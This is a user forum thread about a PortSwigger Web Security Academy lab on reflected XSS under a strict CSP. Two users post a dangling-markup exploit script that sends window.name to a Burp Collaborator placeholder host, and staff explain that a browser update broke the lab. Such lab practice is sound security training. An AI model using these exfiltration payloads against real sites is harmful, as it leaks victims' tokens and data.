Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

In laboratory work, a request for a collaborator is not sent

Andrii | Last updated: Dec 03, 2023 08:22AM UTC

In laboratory work: Lab: Reflected XSS protected by very strict CSP, with dangling markup attack, a request for a collaborator is not sent. I go to the exploit server and insert the appropriate script: <script> if(window.name) { new Image().src='//BURP-COLLABORATOR-SUBDOMAIN?'+encodeURIComponent(window.name); } else { location = 'https://YOUR-LAB-ID.web-security-academy.net/my-account?email=%22%3E%3Ca%20href=%22https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/exploit%22%3EClick%20me%3C/a%3E%3Cbase%20target=%27'; } </script> in the body and click on deliver to victim, but nothing comes to the collaborator

Ben, PortSwigger Agent | Last updated: Dec 04, 2023 10:07AM UTC

Hi Andrii, To confirm, some Chrome updates have broken the current solution for this lab. We believe that we have another way of solving it but are currently running a little competition to see if any other users can also figures this out: https://twitter.com/portswiggerres/status/1726605124443750893?s=46 We will update the official solution in due course.

Mohamed | Last updated: Mar 02, 2024 10:13PM UTC

<script> if(window.name) { new Image().src='//BURP-COLLABORATOR-SUBDOMAIN?'+encodeURIComponent(window.name); } else { location = 'https://0a6a003a04995b67814670ed00a4008f.web-security-academy.net/post?postId=1'; } </script>

Rogucker | Last updated: Mar 11, 2024 02:43PM UTC

Facing the same issue in Mozilla Firefox. No Interactions in Burp.

Ben, PortSwigger Agent | Last updated: Mar 11, 2024 05:31PM UTC

Hi, As noted a few posts above, there are some issues with this particular lab due to a Chrome update. The long term plan is to actually replace the lab but in the interim period the following user has come up with a novel solution to this particular lab: https://skullhat.github.io/posts/reflected-xss-protected-by-very-strict-csp-with-dangling-markup-attack/

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.